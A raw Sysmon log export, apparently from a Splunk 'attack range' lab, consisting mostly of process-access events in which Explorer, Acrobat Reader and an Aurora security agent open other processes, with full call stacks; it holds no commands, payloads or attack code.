DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047515Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:25.465{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047514Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:25.452{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047513Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:25.420{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002688C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\NPSMDesktopProvider.dll+1be4a|C:\Windows\System32\NPSMDesktopProvider.dll+1226e|C:\Windows\System32\NPSMDesktopProvider.dll+12835|C:\Windows\System32\NPSMDesktopProvider.dll+67dc|C:\Windows\System32\TwinUI.dll+7bfb8|C:\Windows\System32\TwinUI.dll+7559d|C:\Windows\System32\TwinUI.dll+75173|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047512Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:25.420{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047511Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:25.420{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047510Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:25.420{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047509Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:25.358{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8ab30|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047508Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:25.358{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+1078f0|C:\Windows\System32\SHELL32.dll+8aaec|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047507Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:25.358{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8aac0|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047506Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:25.358{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\TwinUI.dll+12ccb9|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047505Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:25.348{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047504Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:25.348{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047503Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:25.347{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047502Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:25.345{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000047501Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:25.344{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000047500Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:25.344{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000047499Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:25.338{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047498Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:25.302{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047497Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:25.302{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047496Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:25.302{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047495Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:25.295{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000018783Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:26.769{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4D2359EAAC732AC6B0AC8262F29A1E6,SHA256=55FC2B9499170F2E028EBB9A575C07C2593B23B1CA1AC285458E36C57C326E89,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000047576Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.956{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047575Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.955{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047574Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.908{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader 